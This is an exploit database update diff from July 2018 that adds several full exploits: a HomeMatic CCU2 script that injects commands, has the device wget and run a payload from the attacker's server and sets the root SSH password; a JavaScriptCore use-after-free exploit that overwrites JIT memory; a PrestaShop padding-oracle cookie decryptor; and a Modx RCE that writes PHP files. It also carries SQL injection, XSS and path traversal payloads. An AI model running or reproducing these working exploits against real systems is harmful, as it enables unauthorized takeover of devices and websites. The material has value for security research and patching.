DB: 2018-07-19

8 changes to exploits/shellcodes

JavaScript Core - Arbitrary Code Execution
QNAP Q'Center - change_passwd Command Execution (Metasploit)
Nanopool Claymore Dual Miner - APIs RCE (Metasploit)
QNAP Q'Center - 'change_passwd' Command Execution (Metasploit)
Nanopool Claymore Dual Miner - APIs Remote Code Execution (Metasploit)
HomeMatic Zentrale CCU2 - Remote Code Execution

MailGust 1.9 - Board Takeover SQL Injection
MailGust 1.9 - Board Takeover (SQL Injection)

Cyphor 0.19 - Board Takeover SQL Injection
Cyphor 0.19 - Board Takeover (SQL Injection)

versatileBulletinBoard 1.00 RC2 - 'board takeover' SQL Injection
versatileBulletinBoard 1.00 RC2 - Board Takeover (SQL Injection)

WordPress 2.6.1 - SQL Column Truncation Admin Takeover
WordPress 2.6.1 - Admin Takeover (SQL Column Truncation)

Invision Power Board 1.x?/2.x/3.x - Admin Account Takeover
Invision Power Board 1.x?/2.x/3.x - Admin Takeover

Joomla! < 3.6.4 - Admin TakeOver
Joomla! < 3.6.4 - Admin Takeover
PrestaShop < 1.6.1.19 - 'AES CBC' Privilege Escalation
PrestaShop < 1.6.1.19 - 'BlowFish ECD' Privilege Escalation
Smart SMS & Email Manager 3.3 - 'contact_type_id' SQL Injection
Open-AudIT Community 2.1.1 - Cross-Site Scripting
FTP2FTP 1.0 - Arbitrary File Download
Modx Revolution < 2.6.4 - Remote Code Execution

exploits/hardware/remote/45052.py

@@ -0,0 +1,140 @@
+# Exploit Title: HomeMatic Zentrale CCU2 Unauthenticated RCE
+# Date: 16-07-2018
+# Software Link: https://www.homematic.com/
+# Exploit Author: Kacper Szurek - ESET
+# Contact: https://twitter.com/KacperSzurek
+# Website: https://security.szurek.pl/
+# YouTube: https://www.youtube.com/c/KacperSzurek
+# Category: remote
+  
+1. Description
+   
+File: /root/www/api/backup/logout.cgi
+ 
+```
+proc main { } {
+    set sid [getQueryArg sid]
+     
+    if [catch { session_logout $sid}] { error LOGOUT }
+     
+    puts "Content-Type: text/plain"
+    puts ""
+    puts "OK"
+}
+```
+ 
+`$sid` value is passed directly to `session_logout` function.
+ 
+File: /root/www/tcl/eq3/session.tcl
+ 
+```
+proc session_logout { sid } {
+  rega_exec "system.ClearSessionID(\"$sid\");"
+}
+```
+
+`$sid` value is not escaped properly. 
+
+We can close current rega script using `");` and execute our payload.
+   
+2. Proof of Concept
+ 
+POC in Python which enable ssh access and change root password without any credentials.
+ 
+```
+from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
+import time
+import urllib2
+import threading
+import sys
+import os
+import signal
+
+print "HomeMatic Zentrale CCU2 Unauthenticated RCE"
+print "Unauthenticated Remote Code Execution"
+print "by Kacper Szurek - ESET"
+print "https://security.szurek.pl/"
+print "https://twitter.com/KacperSzurek"
+print "https://www.youtube.com/c/KacperSzurek\n"
+
+def signal_handler(a, b):
+    print "[+] Exit"
+    os._exit(0)
+
+signal.signal(signal.SIGINT, signal_handler)
+
+if len(sys.argv) != 4:
+    print "Usage: exploit <your_ip> <homematic_ip> <new_password>"
+    os._exit(0)
+
+our_ip = sys.argv[1]
+homematic_ip = sys.argv[2]
+new_password = sys.argv[3]
+tcl_file = """
+#!/bin/tclsh
+source /www/api/eq3/jsonrpc.tcl
+source /www/api/eq3/json.tcl
+set args(passwd) "{}"
+set args(mode) "true"
+source /www/api/methods/ccu/setssh.tcl
+source /www/api/methods/ccu/setsshpassword.tcl
+source /www/api/methods/ccu/restartsshdaemon.tcl
+""".format(new_password)
+
+class StoreHandler(BaseHTTPRequestHandler):
+    def do_GET(self):
+        print self.path
+        if self.path == '/exploit':
+            self.send_response(200)
+            self.send_header('Content-type', 'text/html')
+            self.end_headers()
+            self.wfile.write(tcl_file)
+
+def server():
+    try:
+        server = HTTPServer((our_ip, 1234), StoreHandler)
+        server.serve_forever()
+    except Exception, e:
+        print "[-] Cannot start web server: {}".format(e)
+        os._exit(0)
+
+def send_payload(payload):
+    return urllib2.urlopen('http://{}/api/backup/logout.cgi?sid=aa");system.Exec("{}");system.ClearSessionID("bb'.format(homematic_ip, payload)).read()
+
+try:
+    version = urllib2.urlopen('http://{}/api/backup/version.cgi'.format(homematic_ip), timeout=6).read()
+except:
+    version = ""
+
+if not version.startswith('VERSION='):
+    print "[-] Probably not HomeMatic IP: {}".format(homematic_ip)
+    os._exit(0)
+
+if "'" in new_password or '"' in new_password:
+    print "[-] Forbidden characters in password"
+    os._exit(0)
+
+print "[+] Start web server"
+t = threading.Thread(target=server)
+t.daemon = True
+t.start()
+time.sleep(2)
+
+print "[+] Download exploit"
+send_payload('wget+-O+/tmp/exploit+http://{}:1234/exploit&&chmod+%2bx+/tmp/exploit'.format(our_ip))
+
+print "[+] Set chmod +x"
+send_payload('chmod+%2bx+/tmp/exploit')
+
+print "[+] Execute exploit"
+send_payload('/bin/tclsh+/tmp/exploit')
+
+print "[+] Success, now you can ssh as root:"
+print "ssh root@{}".format(homematic_ip)
+print "Password: {}".format(new_password)
+os._exit(0)
+```
+ 
+3. Solution:
+    
+Update to version 2.35.16

exploits/multiple/local/45048.js

@@ -0,0 +1,323 @@
+// Load Int library, thanks saelo!
+load('util.js');
+load('int64.js');
+
+
+// Helpers to convert from float to in a few random places
+var conva = new ArrayBuffer(8);
+var convf = new Float64Array(conva);
+var convi = new Uint32Array(conva);
+var convi8 = new Uint8Array(conva);
+
+var floatarr_magic = new Int64('0x3131313131313131').asDouble();
+var floatarr_magic = new Int64('0x3131313131313131').asDouble();
+var jsval_magic = new Int64('0x3232323232323232').asDouble();
+
+var structs = [];
+
+function log(x) {
+    print(x);
+}
+
+// Look OOB for array we can use with JSValues
+function findArrayOOB(corrupted_arr, groom) {
+    log("Looking for JSValue array with OOB Float array");
+    for (let i = 0; i<corrupted_arr.length; i++) {
+        convf[0] = corrupted_arr[i];
+
+        // Find the magic value we stored in the JSValue Array
+        if (convi[0] == 0x10) {
+            convf[0] = corrupted_arr[i+1];
+            if (convi[0] != 0x32323232)
+                continue;
+
+            // Change the first element of the array
+            corrupted_arr[i+1] = new Int64('0x3131313131313131').asDouble();
+
+            let target = null;
+            // Find which array we modified
+            for (let j = 0; j<groom.length; j++) {
+                if (groom[j][0] != jsval_magic) {
+                    target = groom[j];
+                    break
+                }
+            }
+
+            log("Found target array for addrof/fakeobj");
+
+            // This object will hold our primitives
+            let prims = {};
+
+            let oob_ind = i+1;
+
+            // Get the address of a given jsobject
+            prims.addrof = function(x) {
+                // To do this we put the object in the jsvalue array and
+                // access it OOB with our float array
+                target[0] = x;
+                return Int64.fromDouble(corrupted_arr[oob_ind]);
+            }
+
+            // Return a jsobject at a given address
+            prims.fakeobj = function(addr) {
+                // To do this we overwrite the first slot of the jsvalue array
+                // with the OOB float array
+                corrupted_arr[oob_ind] = addr.asDouble();
+                return target[0];
+            }
+
+            return prims;
+        }
+    }
+}
+
+// Here we will spray structure IDs for Float64Arrays
+// See http://www.phrack.org/papers/attacking_javascript_engines.html
+function sprayStructures() {
+  function randomString() {
+      return Math.random().toString(36).replace(/[^a-z]+/g, '').substr(0, 5);
+  }
+  // Spray arrays for structure id
+  for (let i = 0; i < 0x1000; i++) {
+      let a = new Float64Array(1);
+      // Add a new property to create a new Structure instance.
+      a[randomString()] = 1337;
+      structs.push(a);
+  }
+}
+
+
+// Here we will create our fake typed array and get arbitrary read/write
+// See http://www.phrack.org/papers/attacking_javascript_engines.html
+function getArb(prims) {
+    sprayStructures()
+
+    let utarget = new Uint8Array(0x10000);
+    utarget[0] = 0x41;
+
+    // Our fake array
+    // Structure id guess is 0x200
+    // [ Indexing type = 0 ][ m_type = 0x27 (float array) ][ m_flags = 0x18 (OverridesGetOwnPropertySlot) ][ m_cellState = 1 (NewWhite)]
+    let jscell = new Int64('0x0118270000000200');
+
+    // Construct the object
+    // Each attribute will set 8 bytes of the fake object inline
+    obj = {
+        'a': jscell.asDouble(),
+
+        // Butterfly can be anything
+        'b': false,
+
+        // Target we want to write to
+        'c': utarget,
+
+        // Length and flags
+        'd': new Int64('0x0001000000000010').asDouble()
+    };
+
+
+    // Get the address of the values we stored in obj
+    let objAddr = prims.addrof(obj).add(16);
+    log("Obj addr + 16 = "+objAddr);
+
+    // Create a fake object from this pointer
+    let fakearray = prims.fakeobj(objAddr);
+
+    // Attempt to find a valid ID for our fake object
+    while(!(fakearray instanceof Float64Array)) {
+        jscell.add(1);
+        obj['a'] = jscell.asDouble();
+    }
+
+    log("Matched structure id!");
+
+    // Set data at a given address
+    prims.set = function(addr, arr) {
+        fakearray[2] = addr.asDouble();
+        utarget.set(arr);
+    }
+
+    // Read 8 bytes as an Int64 at a given address
+    prims.read64 = function(addr) {
+        fakearray[2] = addr.asDouble();
+        let bytes = Array(8);
+        for (let i=0; i<8; i++) {
+            bytes[i] = utarget[i];
+        }
+        return new Int64(bytes);
+    }
+
+    // Write an Int64 as 8 bytes at a given address
+    prims.write64 = function(addr, value) {
+        fakearray[2] = addr.asDouble();
+        utarget.set(value.bytes);
+    }
+}
+
+// Here we will use build primitives to eventually overwrite the JIT page
+function exploit(corrupted_arr, groom) {
+    save.push(groom);
+    save.push(corrupted_arr);
+
+    // Create fakeobj and addrof primitives
+    let prims = findArrayOOB(corrupted_arr, groom);
+
+    // Upgrade to arb read/write from OOB read/write
+    getArb(prims);
+
+    // Build an arbitrary JIT function
+    // This was basically just random junk to make the JIT function larger
+    let jit = function(x) {
+        var j = []; j[0] = 0x6323634;
+        return x*5 + x - x*x /0x2342513426 +(x - x+0x85720642 *(x +3 -x / x+0x41424344)/0x41424344)+j[0]; };
+
+    // Make sure the JIT function has been compiled
+    jit();
+    jit();
+    jit();
+
+    // Traverse the JSFunction object to retrieve a non-poisoned pointer
+    log("Finding jitpage");
+    let jitaddr = prims.read64(
+        prims.read64(
+            prims.read64(
+                prims.read64(
+                    prims.addrof(jit).add(3*8)
+                ).add(3*8)
+            ).add(3*8)
+        ).add(5*8)
+    );
+    log("Jit page addr = "+jitaddr);
+
+    // Overwrite the JIT code with our INT3s
+    log("Writting shellcode over jit page");
+    prims.set(jitaddr.add(32), [0xcc, 0xcc, 0xcc, 0xcc]);
+
+    // Call the JIT function, triggering our INT3s
+    log("Calling jit function");
+    jit();
+
+    throw("JIT returned");
+}
+
+
+// Find and set the length of a non-freed butterfly with our unstable OOB primitive
+function setLen(uaf_arr, ind) {
+    let f=0;
+    for (let i=0; i<uaf_arr.length; i++) {
+        convf[0] = uaf_arr[i];
+
+        // Look for a new float array, and set the length
+        if (convi[0] == 0x10) {
+            convf[0] = uaf_arr[i+1];
+            if (convi[0] == 0x32323232 && convi[1] == 0x32323232) {
+                convi[0] = 0x42424242;
+                convi[1] = 0x42424242;
+                uaf_arr[i] = convf[0];
+                return;
+            }
+        }
+    }
+
+    throw("Could not find anouther array to corrupt");
+}
+
+
+let oob_rw_unstable = null;
+let oob_rw_unstable_ind = null;
+let oob_rw_stable = null;
+
+// After this point we would stop seeing GCs happen enough to race :(
+const limit = 10;
+const butterfly_size = 32
+
+let save = [0, 0]
+
+for(let at = 0; at < limit; at++) {
+    log("Trying to race GC and array.reverse() Attempt #"+(at+1));
+
+    // Allocate the initial victim and target arrays
+    let victim_arrays = new Array(2048);
+    let groom  = new Array(2048);
+    for (let i=0; i<victim_arrays.length; i++) {
+        victim_arrays[i] = new Array(butterfly_size).fill(floatarr_magic)
+        groom[i] = new Array(butterfly_size/2).fill(jsval_magic)
+    }
+
+    let vv = [];
+    let  v = []
+
+    // Allocate large strings to trigger the GC while calling reverse
+    for (let i = 0; i < 506; i++) {
+        for(let j = 0; j < 0x100; j++) {
+            // Cause GCs to trigger while we are racing with reverse
+            if (j == 0x44) { v.push(new String("B").repeat(0x10000*save.length/2)) }
+            victim_arrays.reverse()
+        }
+    }
+
+    for (let i = 0; i < victim_arrays.length; i++) {
+
+        // Once we see we have replaced a free'd butterfly
+        // fill the replacing array with 0x41414141... to smash rest
+        // of UAF'ed butterflies
+
+        // We know the size will be 506, because it will have been replaced with v
+        // we were pushing into in the loop above
+
+        if(victim_arrays[i].length == 506) {
+            victim_arrays[i].fill(2261634.5098039214)
+        }
+
+        // Find the first butterfly we have smashed
+        // this will be an unstable OOB r/w
+
+        if(victim_arrays[i].length == 0x41414141) {
+            oob_rw_unstable = victim_arrays[i];
+            oob_rw_unstable_ind = i;
+            break;
+        }
+    }
+
+    // If we successfully found a smashed and still freed butterfly
+    // use it to corrupt a non-freed butterfly for stability
+
+    if(oob_rw_unstable) {
+
+        setLen(oob_rw_unstable, oob_rw_unstable_ind)
+
+        for (let i = 0; i < groom.length; i++) {
+            // Find which array we just corrupted
+            if(groom[i].length == 0x42424242) {
+                oob_rw_stable = groom[i];
+                break;
+            }
+        }
+        if (!oob_rw_stable) {
+            throw("Groom seems to have failed :(");
+        }
+    }
+
+    // chew CPU to avoid a segfault and help with gc schedule
+    for (let i = 0; i < 0x100000; i++) { }
+
+
+    // Attempt to clean up some
+    let f = []
+    for (let i = 0; i < 0x2000; i++) {
+        f.push(new Array(16).fill(2261634.6098039214))
+    }
+
+    save.push(victim_arrays)
+    save.push(v)
+    save.push(f)
+    save.push(groom)
+
+    if (oob_rw_stable) {
+        log("Found stable corrupted butterfly! Now the fun begins...");
+        exploit(oob_rw_stable, groom);
+        break;
+    }
+
+}
+throw("Failed to find any UAF'ed butterflies");

exploits/multiple/webapps/45053.txt

@@ -0,0 +1,68 @@
+#######################################
+# Exploit Title: Open-AudIT Community - 2.1.1 - Cross Site Scripting Vulnerability
+# Google Dork:NA
+# #######################################
+# Exploit Author: Ranjeet Jaiswal#
+#######################################
+# Vendor Homepage: https://opmantek.com/
+# Software Link:http://dl-openaudit.opmantek.com/OAE-Win-x86_64-
+release_2.2.1.exe
+# Affected Version: 2.1.1
+# Category: WebApps
+# Tested on: Windows 10
+# CVE : CVE-2018-11124
+#
+# 1. Vendor Description:
+#
+# Network Discovery and Inventory Software | Open-AudIT | Opmantek
+Discover what's on your network
+Open-AudIT is the world's leading network discovery, inventory and audit
+program. Used by over 10,000 customers.
+#
+# 2. Technical Description:
+#
+# Cross-site scripting (XSS) vulnerability in Attributes functionality in
+Open-AudIT Community edition before 2.2.2 allows remote attackers to inject
+arbitrary web script or HTML via a crafted attribute name of a Attribute,
+as demonstrated in below POC.
+#
+# 3. Proof Of Concept:
+
+ 3.1. Proof of Concept for Injecting html contain
+
+# #Step to reproduce.
+Step1:Login in to Open-Audit
+Step2:Go to Attributes page
+Step3:Select any attribute which are listed
+Step4:click on details tab.
+Step5:In the Name field put the  following payload and click submit.
+
+<p>Sorry! We have moved! The new URL is: <a href="http://geektyper.com/">
+Open-Audit</a></p>
+
+Step6:Go to export tab and export using HTML Table
+Step7:When user open download attribute.html file.You will see redirection
+hyperlink.
+Step8:When user click on link ,User will be redirected to Attacker or
+malicious website.
+
+ 3.2. Proof of Concept for Injecting web script(Cross-site scripting(XSS))
+
+ # #Step to reproduce.
+Step1:Login in to Open-Audit
+Step2:Go to Attributes page
+Step3:Select any attribute which are listed
+Step4:click on details tab.
+Step5:In the Name field put the  following payload and click submit.
+
+<script>alert(hack)</script>
+
+Step6:Go to export tab and export using HTML Table
+Step7:When user open download attribute.html file.Alert Popup will execute.
+
+
+
+# 4. Solution:
+#
+# Upgrade to latest release of Open-AudIT version
+# https://opmantek.com/network-tools-download/open-audit/

exploits/php/webapps/45046.py

@@ -0,0 +1,95 @@
+#!/usr/bin/env python3
+# PrestaShop <= 1.6.1.19 AES (Rijndael) / openssl_encrypt() Cookie Read
+# Charles Fol
+#
+# See https://ambionics.io/blog/prestashop-privilege-escalation
+#
+# This POC will reveal the content of an employee's cookie.
+# By modifying it one can read/write any PrestaShop cookie.
+# It is a simple padding oracle implementation.
+#
+
+
+import requests
+import urllib.parse
+import base64
+
+s = requests.Session()
+"""
+s.proxies = {
+    'http': 'localhost:8080',
+    'https': 'localhost:8080',
+}
+#"""
+
+# Login as an employee, get your cookie and paste it here along with the URL
+URL = "http://vmweb5/prestashop/admin177chuncw/"
+cookie = "PrestaShop-b0ebb4f17b3e451202e5b044e29ed75d=20NxjuYuGVhSt8n0M54Av9Qkpyzl9axkK%2BGgLLCcv0MLQZhLAEV8lnq6U2Ew2n5aMUOYqkrkpqjputuLiBEqqW7pIce8cUv%2F3SEFp3tPnWfCgJgXKUsR1htOQ4KAoXyYLhoc31kVgcm39OhQh5Zg3A78HnO1On2udHwN8dTRdI86kewEFZPNtmMeBF7sAr9zezevsjK1VU4BI84EVXCYQuuhnVehoqfAa9XoZC%2FD3FEmDSuspZw2AUB0S7Py6ks6eEeCVDWieBKDsHD13UK%2FzgM%2F65m5rpU1P4BSQSHN2Qs%3D000208"
+
+# Parse blocks and size
+cookie_name, cookie_value = cookie.split("=")
+cookie_value = urllib.parse.unquote(cookie_value)
+cookie_size = cookie_value[-6:]
+cookie_value = cookie_value[:-6]
+cookie_value = base64.b64decode(cookie_value)
+
+BLOCK_SIZE = 16
+
+def test_padding(data):
+    """Returns true if the padding is correct, false otherwise.
+    One can easily adapt it for customer cookies using:
+    index.php?controller=identity
+    """
+    data = base64.b64encode(data).decode()
+    data = urllib.parse.quote(data)
+    data = data + cookie_size
+    s.cookies[cookie_name] = data
+    r = s.get(URL, allow_redirects=False)
+    s.cookies.clear()
+    return 'AdminLogin' not in r.headers.get('Location', '')
+
+def e(msg):
+    print(msg)
+    exit(1)
+
+if not test_padding(cookie_value):
+    e("Invalid cookie (1)")
+elif test_padding(b"~~~~~"):
+    e("Invalid cookie (2)")
+
+# Perform the padding oracle attack
+
+result = b''
+
+for b in range(1, len(cookie_value) // BLOCK_SIZE + 1):
+    obtained = []
+    current_block   = cookie_value[(b    ) * BLOCK_SIZE:][:BLOCK_SIZE]
+    precedent_block = cookie_value[(b - 1) * BLOCK_SIZE:][:BLOCK_SIZE]
+
+    for p in range(BLOCK_SIZE):
+        nb_obtained = len(obtained)
+
+        for i in range(256):
+            pad = nb_obtained + 1
+            
+            prelude = (
+                b"\x00" * (BLOCK_SIZE - pad) +
+                bytes([i]) +
+                bytes([o ^ pad for o in obtained][::-1])
+            )
+            data = cookie_value + prelude + current_block
+
+            if test_padding(data):
+                print("Got byte #%d of block #%d: %d" % (p, b, i))
+                obtained.append(i ^ pad)
+                break
+        else:
+            e("Unable to decode position %d" % p)
+
+    # Compute the contents of the plaintext block
+
+    result += bytes([o ^ p for p, o in zip(precedent_block, obtained[::-1])])
+    try:
+        print("COOKIE: %s" % result.decode())
+    except UnicodeDecodeError:
+        print("COOKIE: Unable to decode, wait for next block")

exploits/php/webapps/45049.txt

@@ -0,0 +1,52 @@
+# Exploit Title: Smart SMS & Email Manager v3.3 - SQL Injection
+# Google Dork: N/A
+# Date: 17.07.2018
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor Homepage: https://codecanyon.net/item/smart-sms-email-manager-ssem/14817919
+# Version: 3.3
+# Tested on: Kali linux
+====================================================
+The vulnerability allows an attacker to inject sql commands
+from the search section with 'contact_type_id' parameter in the admin panel.
+
+
+# PoC : SQLi :
+
+http://site.net/phonebook/contact_list_data
+
+POST /phonebook/contact_list_data HTTP/1.1
+Host: site.net
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
+Firefox/52.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://site.net/phonebook/contact_list
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 141
+Cookie:
+ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d61b9083afe2435321ba518449f3b108%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22213.14.165.138%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A52.0%29+Gecko%2F20100101+Firefox%2F52.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1531824069%3B%7Dce4c26e8ee366999ae805f61eba75b1a;
+xerone_dolphin=6811071531824070937
+Connection: keep-alive
+first_name=Test&last_name=test&phone_number=5555555&email=test%40test.com
+&dob=07%2F04%2F2018&contact_type_id=280&is_searched=1&page=1&rows=10
+
+
+Parameter: contact_type_id (POST)
+    Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
+GROUP BY clause
+    Payload: client_username=tes&contact_type_id=142' RLIKE (SELECT (CASE
+WHEN (5715=5715) THEN 142 ELSE 0x28 END)) AND 'Jeop' LIKE
+'Jeop&permission_search=1&search_page=217722575636101&is_searched=1&page=1&rows=20
+
+    Type: error-based
+    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (EXTRACTVALUE)
+    Payload: client_username=tes&contact_type_id=142' AND
+EXTRACTVALUE(4506,CONCAT(0x5c,0x7176716271,(SELECT
+(ELT(4506=4506,1))),0x7171707071)) AND 'vZFG' LIKE
+'vZFG&permission_search=1&search_page=217722575636101&is_searched=1&page=1&rows=20
+
+====================================================

exploits/php/webapps/45054.txt

@@ -0,0 +1,34 @@
+# Exploit Title: FTP2FTP 1.0 - Arbitrary File Download
+# Dork: N/A
+# Date: 18.07.2018
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor Homepage: https://codecanyon.net/item/ftp2ftp-server-to-server-file-transfer-php-script/21972395
+# Version: 1.0
+# Category: Webapps
+# Tested on: Kali linux
+# Description : The "download2.php" is vulnerable in the admin panel.
+The attacker can download and read all files known by the name via 'id' parameter.
+
+====================================================
+
+
+# Vuln file : /FTP2FTP/download2.php
+
+1.  <?php
+2.  $file = "tempFiles2/".$_GET['id'];
+3.
+4.
+5.  if (file_exists($file)) {
+6.     header('Content-Description: File Transfer');
+7.     header('Content-Type: application/octet-stream');
+8.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
+9.     header('Expires: 0');
+10.    header('Cache-Control: must-revalidate');
+11.    header('Pragma: public');
+12.    header('Content-Length: ' . filesize($file));
+13.    readfile($file);
+14.    exit;
+15. }
+16. ?>
+
+# PoC : http://sitenet/FTP2FTP/download2.php?id=../index.php

exploits/php/webapps/45055.py

@@ -0,0 +1,85 @@
+# Exploit Title: Modx Revolution < 2.6.4 - Remote Code Execution
+# Date: 2018-07-13
+# Exploit Author: Vitalii Rudnykh
+# Vendor Homepage: https://modx.com/
+# Version: <= 2.6.4
+# CVE : CVE-2018-1000207
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+import sys
+import os
+import requests
+from colorama import init, Fore, Style
+try:
+    init()
+
+    def cls():
+        os.system('cls' if os.name == 'nt' else 'clear')
+
+    cls()
+
+    print(Fore.BLUE +
+          '################################################################')
+    print(Fore.CYAN +
+          '# Proof-Of-Concept for CVE-2018-1000207 (Modx Revolution)')
+    print('# by Vitalii Rudnykh')
+    print('# Thanks by AgelNash')
+    print('# https://github.com/a2u/CVE-2018-1000207/')
+    print(Fore.BLUE +
+          '################################################################')
+    print('Provided only for educational or information purposes')
+    print(Style.RESET_ALL)
+    target = input('Enter target url (example: http(s)://domain.tld/): ')
+
+    verify = True
+    code = '<?php echo md5(\'a2u\'); unlink($_SERVER[\'SCRIPT_FILENAME\']);?>'
+
+    if requests.get(
+            target + '/connectors/system/phpthumb.php',
+            verify=verify).status_code != 404:
+        print(Fore.GREEN + '/connectors/system/phpthumb.php - found')
+        url = target + '/connectors/system/phpthumb.php'
+        payload = {
+            'ctx': 'web',
+            'cache_filename': '../../payload.php',
+            'useRawIMoutput': '1',
+            'src': '.',
+            'IMresizedData': code,
+            'config_prefer_imagemagick': '0'
+        }
+
+        r = requests.post(url, data=payload, verify=verify)
+        check = requests.get(target + 'payload.php', verify=verify)
+        if check.text == '9bdc11de19fd93975bf9c9ec3dd7292d':
+            print(Fore.GREEN + 'Exploitable!\n')
+        else:
+            print(Fore.RED + 'Not exploitable!\n')
+    else:
+        print(Fore.RED + 'phpthumb.php - not found')
+
+    if requests.get(
+            target + '/assets/components/gallery/connector.php',
+            verify=verify).status_code != 404:
+        print(Fore.GREEN + '/assets/components/gallery/connector.php - found')
+        url = target + '/assets/components/gallery/connector.php'
+
+        payload = {
+            'action': 'web/phpthumb',
+            'f': 'php',
+            'useRawIMoutput': '1',
+            'IMresizedData': 'Ok',
+            'config_prefer_imagemagick': '0'
+        }
+        r = requests.post(url, data=payload, verify=verify)
+        if r.text == 'Ok':
+            print(Fore.GREEN + 'Exploitable!\n')
+        else:
+            print(Fore.RED + 'Not exploitable!\n')
+
+    else:
+        print(
+            Fore.RED + '/assets/components/gallery/connector.php - not found')
+
+except KeyboardInterrupt:
+    cls()

files_exploits.csv

@@ -9818,6 +9818,7 @@ id,file,description,date,author,type,platform,port
 45024,exploits/windows/local/45024.rb,"Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)",2018-07-13,Metasploit,local,windows,
 45026,exploits/windows/local/45026.txt,"Microsoft Enterprise Mode Site List Manager - XML External Entity Injection",2018-07-16,hyp3rlinx,local,windows,
 45041,exploits/hardware/local/45041.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Restricted Shell Escape",2018-07-17,LiquidWorm,local,hardware,
+45048,exploits/multiple/local/45048.js,"JavaScript Core - Arbitrary Code Execution",2018-07-11,ret2,local,multiple,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16624,8 +16625,9 @@ id,file,description,date,author,type,platform,port
 45020,exploits/php/remote/45020.rb,"phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,php,80
 45025,exploits/linux/remote/45025.rb,"Hadoop YARN ResourceManager - Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,8088
 45040,exploits/hardware/remote/45040.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Default Credentials",2018-07-17,LiquidWorm,remote,hardware,
-45043,exploits/linux/remote/45043.rb,"QNAP Q'Center - change_passwd Command Execution (Metasploit)",2018-07-17,Metasploit,remote,linux,443
+45043,exploits/linux/remote/45043.rb,"QNAP Q'Center - 'change_passwd' Command Execution (Metasploit)",2018-07-17,Metasploit,remote,linux,443
-45044,exploits/multiple/remote/45044.rb,"Nanopool Claymore Dual Miner - APIs RCE (Metasploit)",2018-07-17,Metasploit,remote,multiple,3333
+45044,exploits/multiple/remote/45044.rb,"Nanopool Claymore Dual Miner - APIs Remote Code Execution (Metasploit)",2018-07-17,Metasploit,remote,multiple,3333
+45052,exploits/hardware/remote/45052.py,"HomeMatic Zentrale CCU2 - Remote Code Execution",2018-07-18,"Kacper Szurek",remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -16792,13 +16794,13 @@ id,file,description,date,author,type,platform,port
 1221,exploits/php/webapps/1221.php,"CuteNews 1.4.0 - Shell Injection / Remote Command Execution",2005-09-17,rgod,webapps,php,
 1225,exploits/php/webapps/1225.php,"My Little Forum 1.5 - 'SearchString' SQL Injection",2005-09-22,rgod,webapps,php,
 1226,exploits/php/webapps/1226.php,"phpMyFAQ 1.5.1 - 'User-Agent' Remote Shell Injection",2005-09-23,rgod,webapps,php,
-1227,exploits/php/webapps/1227.php,"MailGust 1.9 - Board Takeover SQL Injection",2005-09-24,rgod,webapps,php,
+1227,exploits/php/webapps/1227.php,"MailGust 1.9 - Board Takeover (SQL Injection)",2005-09-24,rgod,webapps,php,
 1236,exploits/cgi/webapps/1236.pm,"Barracuda Spam Firewall < 3.1.18 - Command Execution (Metasploit)",2005-09-27,"Nicolas Gregoire",webapps,cgi,
 1237,exploits/php/webapps/1237.php,"PHP-Fusion 6.00.109 - 'msg_send' SQL Injection",2005-09-28,rgod,webapps,php,
 1240,exploits/php/webapps/1240.php,"Utopia News Pro 1.1.3 - 'news.php' SQL Injection",2005-10-06,rgod,webapps,php,
-1241,exploits/php/webapps/1241.php,"Cyphor 0.19 - Board Takeover SQL Injection",2005-10-08,rgod,webapps,php,
+1241,exploits/php/webapps/1241.php,"Cyphor 0.19 - Board Takeover (SQL Injection)",2005-10-08,rgod,webapps,php,
 1244,exploits/php/webapps/1244.pl,"phpMyAdmin 2.6.4-pl1 - Directory Traversal",2005-10-10,cXIb8O3,webapps,php,
-1245,exploits/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 - 'board takeover' SQL Injection",2005-10-10,rgod,webapps,php,
+1245,exploits/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 - Board Takeover (SQL Injection)",2005-10-10,rgod,webapps,php,
 1250,exploits/php/webapps/1250.php,"w-Agora 4.2.0 - 'quicklist.php' Remote Code Execution",2005-10-14,rgod,webapps,php,
 1252,exploits/asp/webapps/1252.html,"MuOnline Loopholes Web Server - 'pkok.asp' SQL Injection",2005-10-15,nukedx,webapps,asp,
 1270,exploits/php/webapps/1270.php,"PHP-Nuke 7.8 - SQL Injection / Remote Command Execution",2005-10-23,rgod,webapps,php,
